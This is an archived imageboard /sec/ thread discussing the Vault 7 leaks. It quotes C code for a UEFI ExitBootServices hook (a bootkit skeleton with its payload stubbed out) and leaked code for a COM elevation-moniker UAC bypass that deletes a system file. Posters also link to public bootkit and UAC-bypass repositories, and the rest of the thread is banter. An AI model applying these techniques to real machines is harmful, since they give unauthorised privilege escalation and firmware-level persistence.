[ art / civ / cult / cyb / diy / drg / feels / layer / lit / λ / q / r / sci / sec / tech / w / zzz ] archive provided by lainchan.jp

lainchan archive - /sec/ - 4639



File: 1488937354757.png (3.84 MB, 204x204, fail.gif)

No.4639

  extern EFI_BOOT_SERVICES *gBS;
EFI_EXIT_BOOT_SERVICES gOrigExitBootServices;



EFI_STATUS
EFIAPI
ExitBootServicesHook(IN EFI_HANDLE ImageHandle, IN UINTN MapKey){

/* <hook related fun> */
/* Do fun hook-related stuff here */
/* </hook-related fun> */

/* Fix the pointer in the boot services table */
/* If you don't do this, sometimes your hook method will be called repeatedly, which you don't want */
gBS->ExitBootServices = gOrigExitBootServices;

/* Get the memory map */
UINTN MemoryMapSize;
EFI_MEMORY_DESCRIPTOR *MemoryMap;
UINTN LocalMapKey;
UINTN DescriptorSize;
UINT32 DescriptorVersion;
MemoryMap = NULL;
MemoryMapSize = 0;


do {
Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion);
if (Status == EFI_BUFFER_TOO_SMALL){
MemoryMap = AllocatePool(MemoryMapSize + 1);
Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion);
} else {
/* Status is likely success - let the while() statement check success */
}
DbgPrint(L"This time through the memory map loop, status = %r\n",Status);

} while (Status != EFI_SUCCESS);

return gOrigExitBootServices(ImageHandle,LocalMapKey);

}
EFI_STATUS
EFIAPI
HookDriverMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable){

/* Store off the original pointer and replace it with your own */
gOrigExitBootServices = gBS->ExitBootServices;
gBS->ExitBootServices = ExitBootServicesHook;

/* It's hooked! Return EFI_SUCCESS so your driver stays in memory */
return EFI_SUCCESS;
}

Think it works?

  No.4640

File: 1488945031168.png (4.32 KB, 200x100, Oekaki.png)


  No.4641

so where do we go from here, lains? they're in everything. I was just making baby steps into security on the software side, and today I found out my best shot at cybersecurity would be to go Amish and throw out all my electronics.
Is there any hope if people can buy non-backdoored open hardware?

  No.4642

uhm if i can just interject. The source they 'leaked' is all on github (i have links 4 proof 2) and has been for years. This isn't cutting edge malware and I feel like you'd have a hard time breaching even a poorly updated (and pirated) copy of Win7. Like the SetWindowsHookEx and COM UAC bypass were top kek.

There isn't much 2 worry about here, even using windows you can get around all of it (update regularly and turn off the tragedy known as UAC).

  No.4644

>>4641
This sounds like my situation.
Other than going amish the only people that can really feel safe are those who know a lot about cybersecurity related topics

  No.4648

>>4642
The leaks include years of older stuff, not just the most recent

  No.4665

>>4642
UAC is easily bypassed according to the leaks

https://wikileaks.org/ciav7p1/cms/page_3375231.html

  HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
{
BIND_OPTS3 bo;
WCHAR wszCLSID[50];
WCHAR wszMon[300];

StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
return hr;
memset(&bo, 0, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hwnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
return CoGetObject(wszMon, &bo, riid, ppv);
}

void ElevatedDelete()
{
MessageBox(NULL, "DELETING", "TESTING", MB_OK);

// This is only availabe on Vista and higher
HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
IFileOperation *pfo;
hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
pfo->SetOperationFlags(FOF_NO_UI);
IShellItem *item = NULL;
hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
pfo->DeleteItem(item, NULL);
pfo->PerformOperations();
item->Release();
pfo->Release();
CoUninitialize();
}

  No.4666

File: 1489032617480.png (2.83 KB, 200x100, Oekaki.png)

>>4641
>Is there any hope if people can buy non-backdoored open hardware?
Yes, anon this is possible, in fact, this hardware solution is so secure the CIA doesnt want you to know about it.

The most secure way to compute...
is with an abacus.

pros:
100% hack proof.
no known software vulnerabilities.
buffer overflow attacks do not affect operation.
immune to DDoS.
immune to bot nets.
impossible to remotely access.

cons:
little to no support for additional hardware

  No.4671

>>4665

like and it has been for years see:

https://github.com/hfiref0x/UACME

Like all this soykaf is skid level/very known 'hacks'.

  No.4686

>>4666
As of now I'm working on a physically implemented stack machine using marble balls. Once I figure out a decent intuitive representation system, I'll publish entire design under GPLv2 and NSA will get destroyed by power of Free Software community.

  No.4694

>>4666
I'm not sure lainon. It's not being maintained. Hasn't been a firmware update since 207BCE. And this might just be me but I had a lot of hardware problems with mine. I got it home and tested it and it was working fine but after I riced it out with all my stickers it would only count in units of 2-3. This made decoding my high bit-rate chinese cartoons very difficult.

  No.4697

>>4671
This is probably why this section of code was released, and why none of the other code snippets have been released yet.

This was published because its already publically available. There are many snippets of code upcoming though which I would guess to be not so readily available.

  No.4698

>>4694
You need to backport your stickers. It sounds like their physical memory footprint is much to big.

Try optmizing the stickers to use a smaller footprint, and you abacus will likely be able to manage them better

  No.4699

>>4671
is there code on git for the above UEFI hack?

  No.4700

>>4699

UEFI bootkits have been a thing since 2012. Hacking teams i think is what most of them are still based off of (but youre fuarrrking retarded to still use a UEFI kit in 2017 just find a kernel or (easier) third-party driver exploit).

https://github.com/quarkslab/dreamboot